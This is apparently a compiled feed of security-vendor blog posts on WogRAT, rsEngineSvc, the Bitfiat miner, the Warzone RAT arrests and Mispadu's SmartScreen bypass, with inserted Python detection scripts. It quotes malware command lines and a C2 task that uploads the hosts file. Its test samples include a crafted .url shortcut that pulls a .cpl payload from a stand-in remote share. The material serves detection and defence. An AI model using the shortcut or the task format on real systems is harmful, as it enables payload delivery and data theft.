The strange thing about WogRAT is that its spreading campaigns themselves were not observed, even though some of the methods were explained in the original research. The malware (more specifically, its loader) is disguised as a file posted on an online notepad service. Its naming suggests that the fraudsters offer WogRAT as a system or program tweaking utility of some sort. This, in turn, suggests that initial distribution happens in "closed" places, such as chats in messengers.

Figure: Encoded strings stored in aNotepad

Names of the loader files available from aNotepad:

BrowserFixup.exe, ChromeFixup.exe, WindowsApp.exe, WindowsTool.exe, HttpDownload.exe, ToolKit.exe, flashsetup_LL3gjJ7.exe

WogRAT Malware Technical Analysis

As mentioned, the initial download from the aNotepad site yields only the loader, in encoded form. Upon execution, it compiles itself on the fly and requests the actual payload from a different page hosted on the same site. Depending on the attack, the source of the second-stage payload may differ.

The command used by the loader to compile itself (cvtres.exe is the resource converter that the C# compiler, csc.exe, invokes while building an assembly; the username in the path is redacted):

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 /OUT:C:\Users\\AppData\Local\Temp\RESF175.tmp c:\Users\\AppData\Local\Temp\2jahfobn\CSC51D40ACB8B5440B2A46FD286719924C.TMP

The downloaded file is a similar .NET assembly, encoded with Base64 and stored as a text string on the source website. The loader decodes the payload and loads it into memory using the process hollowing technique.

The WerFault.exe command line observed at this stage:

C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 2068
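The two-stage behaviour above (on-the-fly compilation out of the user's Temp directory, then hollowing a WerFault.exe instance) leaves recognisable traces in process-creation telemetry. The Python below is an added example, not code from the original post or from ASEC's research: it scores a handful of constructed Sysmon-style process records against two heuristics, .NET build tools writing into a user-writable directory, and WerFault.exe launched by something other than the WER service or the crashing process itself. The record layout, PIDs, parent images and the "victim" user name are my assumptions; the cvtres and WerFault command lines are the ones quoted above.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event 1 style), constructed for this example."""
    pid: int
    image: str
    cmdline: str
    ppid: int
    parent_image: str


# Locations a standard user can write to; a process launched from here that
# drives compiler tools or WerFault.exe deserves a closer look.
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\", "\\downloads\\")

# The .NET build tools the loader drives to compile itself on the fly.
DOTNET_BUILD_TOOLS = {"csc.exe", "vbc.exe", "cvtres.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def score_event(ev: ProcEvent) -> list[str]:
    """Return the heuristics this record trips; an empty list means nothing odd."""
    hits = []
    image = _basename(ev.image)
    if image in DOTNET_BUILD_TOOLS and _in_user_writable(ev.cmdline):
        hits.append("on-the-fly .NET compilation with output under a user-writable directory")
    if image == "werfault.exe":
        if _in_user_writable(ev.parent_image):
            hits.append("WerFault.exe spawned from a user-writable directory")
        # A genuine crash report is started either by the WER service (svchost.exe)
        # or by the faulting process itself, in which case -p names the parent PID.
        m = re.search(r"\s-p\s+(\d+)", ev.cmdline)
        reported = int(m.group(1)) if m else None
        if _basename(ev.parent_image) != "svchost.exe" and reported is not None and reported != ev.ppid:
            hits.append("WerFault.exe -p does not name its parent (not an ordinary crash report)")
    return hits


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map the PID of every flagged record to its reasons."""
    return {ev.pid: h for ev in events if (h := score_event(ev))}


# Constructed records; "victim" stands in for the redacted user name.
SAMPLE_EVENTS = [
    ProcEvent(7804, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "
              r"/OUT:C:\Users\victim\AppData\Local\Temp\RESF175.tmp "
              r"c:\Users\victim\AppData\Local\Temp\2jahfobn\CSC51D40ACB8B5440B2A46FD286719924C.TMP",
              7796, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"),
    ProcEvent(8012, r"C:\Windows\SysWOW64\WerFault.exe",
              r"C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 2068",
              7720, r"C:\Users\victim\Downloads\ChromeFixup.exe"),
    # Two benign crash reports: one started by the WER service, one by the crashing app.
    ProcEvent(4100, r"C:\Windows\System32\WerFault.exe",
              r"C:\Windows\System32\WerFault.exe -u -p 5560 -s 1234",
              1204, r"C:\Windows\System32\svchost.exe"),
    ProcEvent(4200, r"C:\Windows\System32\WerFault.exe",
              r"C:\Windows\System32\WerFault.exe -u -p 5560 -s 1300",
              5560, r"C:\Program Files\Vendor\App.exe"),
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Both rules need tuning before they become alerts: PowerShell's Add-Type, some installers and IDEs also compile into the Temp directory, so allowlist their parent images, and treat the WerFault rule as a hunting query rather than a blocking one.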

Upon startup, WogRAT collects basic system information by reading registry keys and executing commands. In particular, it gathers information about network connections, the system version, the username and some system policies. The malware bundles this data with information about its own process and sends it to the command server in an HTTP POST request. After that, it goes idle, waiting for commands.

The initial check-in, as sent in the POST body:

act=on&bid=4844-1708721090438&name=System1\User1

WogRAT has a rather interesting set of commands and properties that it expects to receive. The simplified formula consists of three elements:

Element            Value and purpose
task_id=%id%       text value that identifies the task
task_type=%type%   numeric value that selects the action
task_data=%data%   path to the file the task should be applied to (a URL for downloads)

The resulting command is like the following:

task_id=upldr&task_type=3&task_data=C:\\Windows\System32\drivers\etc\hosts

This malware supports five types of operations: running specific files, downloading or uploading files, altering the idle time, and terminating execution. Not a huge list at first glance, but combined with the ability to fetch and run arbitrary files this amounts to full-fledged backdoor functionality.
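The check-in and task messages above are simple enough to parse on the wire. The following Python is an added example, not code from the original post: it classifies HTTP POST bodies as a WogRAT beacon or task and splits the fields out, which is what a network detection rule or a C2 emulator would need. Reading the bid value as a millisecond Unix timestamp is my own inference from the sample above, not something the research states, and the task_type numbers are left uninterpreted because the mapping to actions is not given.

```python
from datetime import datetime, timezone
from urllib.parse import parse_qsl

# Message bodies quoted in the analysis above.
BEACON = r"act=on&bid=4844-1708721090438&name=System1\User1"
TASK = r"task_id=upldr&task_type=3&task_data=C:\\Windows\System32\drivers\etc\hosts"


def parse_fields(body: str) -> dict[str, str]:
    """Split a key=value&key=value body. Backslashes are sent unescaped, which
    parse_qsl leaves alone (it only decodes '%' sequences and '+')."""
    return dict(parse_qsl(body, keep_blank_values=True))


def classify_body(body: str) -> dict:
    """Recognise the two WogRAT message shapes; anything else comes back as kind=None."""
    f = parse_fields(body)
    if f.get("act") == "on" and "bid" in f and "name" in f:
        host, _, user = f["name"].partition("\\")
        return {"kind": "beacon", "bid": f["bid"], "host": host, "user": user}
    if {"task_id", "task_type", "task_data"} <= f.keys():
        try:
            task_type = int(f["task_type"])
        except ValueError:
            task_type = None
        return {"kind": "task", "task_id": f["task_id"], "task_type": task_type,
                "task_data": f["task_data"]}
    return {"kind": None, "fields": f}


def bid_timestamp(bid: str):
    """My reading of the bot id (an assumption, not stated in the research): the part
    after the dash is a Unix time in milliseconds. Returns an aware datetime or None."""
    _, _, tail = bid.partition("-")
    if len(tail) != 13 or not tail.isdigit():
        return None
    return datetime.fromtimestamp(int(tail) / 1000, tz=timezone.utc)


def scan(bodies: list[str]) -> list[dict]:
    """Return only the bodies that match a WogRAT shape, ready to feed into an alert."""
    return [r for r in map(classify_body, bodies) if r["kind"]]


if __name__ == "__main__":
    for hit in scan([BEACON, TASK, "q=hello&lang=en"]):
        print(hit)
    print("beacon id timestamp:", bid_timestamp("4844-1708721090438"))
```

The host\user pair in the beacon is worth extracting on its own: it is the one field that ties a captured POST back to a specific machine in your inventory.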

How to remove WogRAT?

WogRAT is not the stealthiest malware out there; it relies more on its tricky spreading method and two-stage loader. Still, the number of hooks it creates in the system makes it hard to remove manually. For that reason, I recommend GridinSoft Anti-Malware: a full scan will be enough to remove the RAT and all of its parts.

rsEngineSvc.exe Process: Reason Core Security Engine Service
https://gridinsoft.com/blogs/rsenginesvc-exe-process-remove/
Wed, 28 Feb 2024 15:36:46 +0000

The post rsEngineSvc.exe Process: Reason Core Security Engine Service appeared first on Gridinsoft Blog.
RsEngineSvc.exe is an executable file associated with RAV Antivirus, a program developed by ReasonLabs. While less dangerous than malware, it may be categorized as a PUP (potentially unwanted program). Such software is usually bundled with other free applications and installed without the user's knowledge, or distributed through deceptive advertising.

Is Rsenginesvc.exe Virus?

As noted above, the rsEngineSvc.exe process is part of RAV Antivirus (Reason Core Security Engine Service). It is a program from ReasonLabs that supposedly protects against viruses and other threats. In practice, RAV Antivirus tends to appear after the user clicks a malicious link or installs a cracked program.

Figure: RAV Antivirus main interface

Normally, rsEngineSvc.exe should not cause significant trouble. Nonetheless, its appearance is hardly desirable. The behavior of this "antivirus" is also obtrusive, with pop-ups and startup scans that cannot be disabled. Combined with higher-than-usual resource consumption, this is a good reason to remove rsEngineSvc from your computer.

RsEngineSvc.exe High CPU and Disk Usage Explained

As with any antivirus, RAV, which contains rsEngineSvc.exe, performs scanning operations. During this routine it is natural for an antivirus to use CPU power and create noticeable disk load. However, due to lackluster development, rsEngineSvc.exe (Reason Core Security Engine Service) is much less efficient, which leads to excessive use of system resources.

Figure: rsEngineSvc.exe process in Task Manager

The problem is particularly noticeable on systems with hard disk drives. HDDs are slow enough to be overloaded by a single program that uses them intensively. Such discomfort, combined with the less-than-controllable behavior, is yet another reason to remove rsEngineSvc.

It is important to emphasize that the load created by rsEngineSvc.exe is not malicious, i.e. it does not mine cryptocurrency or perform other illegal activities at your expense.

Can I delete or uninstall rsEngineSvc.exe?

To remove rsEngineSvc.exe from your system, I'd recommend Gridinsoft Anti-Malware. Since RAV Antivirus commonly arrives bundled with other programs, your system is likely to be flooded with other PUAs as well, and proper anti-malware software is essential to get it clean.

How do you prevent rsEngineSvc.exe or other PUPs from installing?

To prevent the installation of rsenginesvc.exe or other potentially unwanted programs (PUPs), you need to be careful when downloading and installing freeware from the Internet. Additionally, exercise caution when visiting suspicious websites and opening unexpected emails.
Here are some tips to help you protect your computer from PUPs:

  • Use reliable antivirus software such as Gridinsoft Anti-Malware and keep it updated. This will help you detect and remove PUPs if they get onto your system.
  • Be careful when visiting unknown or suspicious websites, and do not click on pop-ups, banners or links that may lead to a PUP download.
  • Be careful when downloading and installing freeware from unreliable sources, and always choose the custom or advanced installation mode to decline bundled offers. Some programs install other programs alongside themselves without your consent or knowledge, so read all terms and agreements before installing any software.

Bitfiat Process High CPU – Explained & Removal Guide
https://gridinsoft.com/blogs/bitfiat-process-high-cpu/
Wed, 28 Feb 2024 15:28:06 +0000

The post Bitfiat Process High CPU – Explained & Removal Guide appeared first on Gridinsoft Blog.
Bitfiat is a malicious coin miner that exploits your computer's hardware to mine cryptocurrency. Such malware takes as many resources as it can, making the system impossible to use. Let's see what this malware is, and how to remove it.

Bitfiat Overview

The Bitfiat process is related to the activity of a malicious coin miner. Such malware uses your computer's resources to mine cryptocurrency, mainly Monero or DarkCoin. An unusual part about Bitfiat is its origins: it is based on its own code rather than on XMRig. This, however, is the only respect in which it differs from other malicious miners; its behavior is as unpleasant as in every other case.

As for the symptoms, they are typical: it causes the CPU to run at maximum capacity, often reaching 100%. You may also notice that your computer’s fan runs at full speed even when you are not using any programs. Moreover, this process usually appears in Task Manager and consumes the most resources. Although coin miners usually don’t harm your files, they make your system unusable due to an overloaded CPU.

Figure: The Bitfiat process in Task Manager

Bitfiat Virus Analysis

Despite its origins differing from the majority of malicious miners, the infection chain of Bitfiat is pretty much the same. Let's start from the very beginning and explore the operations of this malware. Fortunately, there are enough samples to analyze.

Spreading Methods

Bitfiat propagates through various channels, primarily cracked software and software activators ("cracks"). These are often distributed through illicit channels such as torrents and online forums, enticing users with the promise of unlocking premium features without paying. Even though it sounds like a fairy tale, unwary users keep downloading such "free" premiums.

Another distribution channel is botnets. By paying the operators of a botnet built with dropper malware, crooks can obtain massive numbers of mining nodes. The catch is that once something as visible as a coin miner is deployed, the entire delivery chain is likely to be uncovered and the dropper removed from the machine. To maximize profit, miners are therefore spread alongside other "visible" malware, such as ransomware or proxyware.

Launch, C2 Connection & Mining

The majority of Bitfiat samples have no detection-evasion tricks. And, well, how can you evade detection when your process takes up to 80% of the CPU? Right after launch, the malware performs an IP check, collects some basic system information and connects to the command server.

The command infrastructure used by Bitfiat is rather unusual: there is no direct connection to the "main" C2. Instead, the malware retrieves instructions from other infected machines, i.e. they operate as a p2p network. This provides much better resilience, up to autonomous operation when the command server is unresponsive.

Figure: Bitfiat's P2P command-and-control architecture

The instructions, delivered as a config file, contain the mining pool and the crypto wallet address. After executing a few command prompt lines, the malware starts mining. This is the point where the most noticeable sign of a malicious miner appears: an overloaded CPU and a strange process in the list of running programs.
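Because the config delivered to Bitfiat carries a pool and a wallet address, those two artefacts are the most useful things to pull from a sample, a memory dump or a captured config, and the wallet in particular lets you link infections across hosts. The Python below is an added example, not Bitfiat's own code or config format (which the post does not show): it carves Monero-style addresses and pool endpoints out of an arbitrary text blob such as the output of strings. The config line, wallet string and the 203.0.113.77 address are constructed, and the list of pool ports is my assumption to tune.

```python
import re

# Monero base58 alphabet (no 0, O, I, l). Standard addresses are '4' + 94 chars,
# subaddresses '8' + 94 chars, integrated addresses '4' + 105 chars.
B58 = "[1-9A-HJ-NP-Za-km-z]"
MONERO_RE = re.compile(rf"\b(?:4{B58}{{105}}|[48]{B58}{{94}})\b")

# Explicit stratum pool URLs, then bare host:port pairs on ports that Monero
# pools commonly listen on (assumed list; adjust for your environment).
STRATUM_RE = re.compile(r"\bstratum(?:\+(?:tcp|ssl))?://[\w.-]+:\d{2,5}\b", re.I)
HOSTPORT_RE = re.compile(r"\b(?:\d{1,3}(?:\.\d{1,3}){3}|(?:[\w-]+\.)+[a-z]{2,}):\d{2,5}\b", re.I)
POOL_PORTS = {3333, 4444, 5555, 7777, 9999, 14444, 14433, 45700}


def is_monero_address(candidate: str) -> bool:
    """Shape check only: prefix, length and alphabet (no checksum verification)."""
    return MONERO_RE.fullmatch(candidate) is not None


def extract_wallets(text: str) -> list[str]:
    return list(dict.fromkeys(MONERO_RE.findall(text)))  # de-duplicate, keep order


def extract_pools(text: str) -> list[str]:
    pools = list(dict.fromkeys(STRATUM_RE.findall(text)))
    # Strip the stratum URLs so their host:port part is not reported twice.
    remainder = STRATUM_RE.sub(" ", text)
    for hostport in HOSTPORT_RE.findall(remainder):
        if int(hostport.rsplit(":", 1)[1]) in POOL_PORTS and hostport not in pools:
            pools.append(hostport)
    return pools


def iocs(text: str) -> dict[str, list[str]]:
    return {"wallets": extract_wallets(text), "pools": extract_pools(text)}


# Constructed sample: an obviously fake wallet of the right shape plus a few
# strings of the kind a dumped miner config or binary would contain.
FAKE_WALLET = "4" + ("Ab7Kq" * 19)[:94]
SAMPLE_STRINGS = "\n".join([
    r"C:\Users\victim\AppData\Roaming\svchost32.exe",
    '{"pool": "stratum+tcp://pool.example-xmr.test:3333", "wallet": "' + FAKE_WALLET + '", "worker": "bot01"}',
    "backup=203.0.113.77:14444",
    "update=https://api.example.test:8443/health",
])

if __name__ == "__main__":
    for kind, values in iocs(SAMPLE_STRINGS).items():
        print(kind, values)
```

The address check is deliberately shape-only; it is enough for triage, and a match that turns out to be a false positive costs far less than missing the wallet that ties twenty infected hosts to one operator.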

How To Remove Bitfiat?

Effective removal of a crypto miner requires a complex approach to neutralize all of its actions. Unlike other types of malware, a miner can overload the system so that the removal tool has no resources left. To avoid this, the removal guide has one extra step.

  • Download and install GridinSoft Anti-Malware. The first thing to do is to deploy the removal tool, even though it will be used later.

  • Switch your Windows to Safe Mode with Networking. By booting into Safe Mode with Networking, you prevent the Bitfiat process from loading and hogging the CPU, which lets the antivirus work uninterrupted.
  • Start the Full Scan. By running a Full Scan, you make the program check every single element of the system. Such a thorough scan is essential to ensure that all the malware present in the system is removed. After the scan, click “Clean Now” to get rid of all the detected items.

Warzone RAT Dismantled, Members Arrested
https://gridinsoft.com/blogs/warzone-rat-dismantled/
Mon, 12 Feb 2024 21:39:18 +0000

The post Warzone RAT Dismantled, Members Arrested appeared first on Gridinsoft Blog.
In an international law enforcement operation, the U.S. Department of Justice continued its fight against cybercriminals, dismantling a network that sold and supported the Warzone Remote Access Trojan (RAT). This malware allowed cybercriminals to stealthily infiltrate victims' computers, resulting in data theft and other malicious activities.

Warzone RAT Masters Arrested and Charged

The operation of the US Department of Justice resulted in the indictment of two key figures: Daniel Meli, 27, of Zabbar, Malta, and Prince Onyeosiri Odinakachi, 31, of Nigeria. Meli was detained in Malta, facing charges of unauthorized computer damage and selling electronic interception devices. Odinakachi, arrested in Nigeria, is charged with conspiracy to commit computer intrusion offenses.

Figure: Seizure notice displayed on the website www.warzone[.]ws

These arrests are the result of international cooperation in combating this threat. The success of the operation was largely due to the collaborative efforts of various international law enforcement agencies, including the FBI, Europol, the Economic and Financial Crimes Commission of Nigeria, and others. This coordinated approach has helped in the fight against cybercrime, which is increasingly borderless.

Implications and Sentencing

The charges against Meli and Odinakachi carry penalties of up to five years in prison, three years of supervised release, and a $250,000 fine. These prosecutions send a strong message to cybercriminals and those who facilitate their activities. Certainly, the international community is taking strong action to protect cyber integrity and hold criminals accountable.

James R. Drabick and Carol E. Head, who are Assistant U.S. Attorneys for the District of Massachusetts, obtained seizure warrants for Odinakachi. Drabick is also prosecuting the case against Odinakachi. Meanwhile, Bethany L. Rupert and Michael Herskowitz, who are Assistant U.S. Attorneys for the Northern District of Georgia, are prosecuting Meli.

What is Warzone RAT?

Warzone RAT is a malicious remote access tool that allows unauthorized users to secretly access and control victims' computers. The malware has facilitated a range of illegal activities, from data theft to webcam surveillance, without the knowledge or consent of the victims. In early 2024, Warzone was marketed at $37.95 per month and was sold primarily to individuals through a clear-web site.

Figure: Warzone RAT listing on Hack Forum

The overall action around Warzone is most likely part of an anti-spyware policy wave that rose in early February 2024. A number of governments across the globe, together with major security vendors, started a campaign against "legal spyware". That includes both government-backed vendors of such malware and freelancers who market malicious programs under the guise of legitimate surveillance tools. Such people will be detained or at least banned from entering the countries that participate in the campaign. The Warzone RAT story may not be the major event, but it is still part of the action.

Mispadu Banking Trojan Exploits SmartScreen Flaw
https://gridinsoft.com/blogs/mispadu-banking-trojan-exploits-smartscreen-flaw/
Mon, 05 Feb 2024 14:03:26 +0000

The post Mispadu Banking Trojan Exploits SmartScreen Flaw appeared first on Gridinsoft Blog.
Recent research uncovers a new sample of Mispadu malware that uses a SmartScreen bypass flaw to get onto the system. This banking trojan from 2019 exploits a vulnerability discovered in late 2023 to target mainly LATAM users.

Mispadu Trojan Uses SmartScreen Bypass

The extensive research on Mispadu by Unit 42 underscores, among other things, the use of a Windows vulnerability to circumvent SmartScreen protection. The flaw, CVE-2023-36025, was detected and fixed by Microsoft in November 2023. However, as of early February 2024 there are already several cases of malware exploiting it, meaning that users hesitate to install the patch. Earlier, we wrote about a Phemedrone Stealer campaign that uses the same evasion approach.

The flaw is easy to exploit: all that is needed is a specially crafted Internet Shortcut (.url) file. Because such a file slips past the check SmartScreen performs on downloaded content, the system does not show the SmartScreen warning about running a potentially dangerous file. In the background, the URL file makes a connection to the command server and downloads the payload in the form of a binary file.

Figure: Contents of the URL file used to download the Mispadu banker

The cybercriminals behind Mispadu commonly use email spam to deliver these crafted URL files. However, other spreading methods may be even more successful, such as sharing the file via social media, as the Phemedrone operators do.
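The .url files at the centre of this bypass are plain INI text, which makes them easy to triage in bulk at a mail gateway or in a download directory. The Python below is an added example, not code from the original post or from Unit 42's research: it parses the [InternetShortcut] section and flags the traits that distinguish a weaponised shortcut from an ordinary web link, namely a target on a remote share (UNC or file://host, i.e. WebDAV), an executable or script extension, and an icon fetched from a remote host. The sample file contents and the 203.0.113.10 address are constructed, and the extension list is my choice.

```python
import configparser
from urllib.parse import urlsplit

# Extensions that turn a "shortcut" into code execution once the target is opened.
EXECUTABLE_EXTS = {".exe", ".cpl", ".scr", ".dll", ".js", ".jse", ".vbs", ".vbe", ".wsf",
                   ".hta", ".bat", ".cmd", ".ps1", ".lnk", ".msi"}


def parse_url_file(text: str) -> dict[str, str]:
    """Return the keys of the [InternetShortcut] section (a .url file is plain INI)."""
    cfg = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cfg.read_string(text)
    if not cfg.has_section("InternetShortcut"):
        return {}
    return {k.lower(): (v or "") for k, v in cfg.items("InternetShortcut")}


def _is_remote_file(target: str) -> bool:
    """True for UNC targets (two leading backslashes) and for file://host/... targets,
    both of which Windows fetches from a remote share rather than treating as a web page."""
    t = target.strip()
    if t.startswith("\\\\"):
        return True
    parts = urlsplit(t)
    return parts.scheme.lower() == "file" and bool(parts.netloc)


def _extension(target: str) -> str:
    path = urlsplit(target).path if "://" in target else target
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def assess(text: str) -> list[str]:
    """Findings for one .url file; an empty list means it looks like an ordinary web link."""
    fields = parse_url_file(text)
    target = fields.get("url", "")
    if not target:
        return ["no URL field (not a usable shortcut)"]
    findings = []
    if _is_remote_file(target):
        findings.append("target is a remote file share (UNC/WebDAV), not a web page")
    ext = _extension(target)
    if ext in EXECUTABLE_EXTS:
        findings.append(f"target is an executable or script ({ext})")
    icon = fields.get("iconfile", "")
    if icon and (_is_remote_file(icon) or icon.lower().startswith(("http://", "https://"))):
        findings.append("IconFile points to a remote host (Explorer fetches it when rendering the folder)")
    return findings


# Constructed samples. 203.0.113.10 is a documentation address, not a real C2.
BENIGN = """[InternetShortcut]
URL=https://example.com/docs/invoice.html
"""

MALICIOUS = r"""[InternetShortcut]
URL=file://203.0.113.10@80/share/update.cpl
IconFile=\\203.0.113.10@80\share\icon.ico
IconIndex=0
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, "->", assess(sample) or "no findings")
```

Patching CVE-2023-36025 is still the real fix; this check only helps you find the files that arrived before the patch, or that a user might double-click regardless of the SmartScreen prompt.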

What is Mispadu Malware?

Mispadu itself is a rather unusual banking trojan that emerged back in 2019. It is distinguished by a peculiar region check, persistent code encryption and heavy obfuscation. For instance, to detect whether it runs in a prohibited region, it does not use a "traditional" IP address block list. Instead, Mispadu checks the offset of the current system time from UTC and ceases execution if the value exceeds the set limit.

Figure: Equation the malware evaluates to decide whether it may run in the current region

This financial infostealer targets a range of financial websites, searching for matches in the browsing history. Once Mispadu finds one present in its target list, it looks for the password in the browser's AutoFill storage and sends it to the command server. As a result, the attackers get a full set of credentials for financial services.

Despite having a flexible mechanism for targeting different banking and crypto services in different countries, the stealer focuses mainly on ones from both Americas and Western Europe. It is not clear whether this selection reflects the location of the operators or other factors.

How to Protect Yourself?

Malware like Mispadu is severe, though it can rarely be called unavoidable. It exploits a well-known flaw that is fixed in the latest Windows updates; hence, by simply updating the system you already eliminate the primary delivery vector this malware employs.

Nonetheless, keep in mind that the file itself reaches the target system within a spam email. Email remains the main propagation method for malware, scams and phishing attacks. Know how to distinguish a phishing email from a genuine one, and you will have far fewer chances of getting into trouble at all.

Use reliable anti-malware software as an additional protection layer. Everyone can make a mistake, and that's completely normal: only those who do nothing never make one. To be covered for such cases, I'd recommend GridinSoft Anti-Malware, a reliable, lightweight and easy-to-use anti-malware tool. Its detection mechanisms will be able to detect and stop such malware at its very beginning.
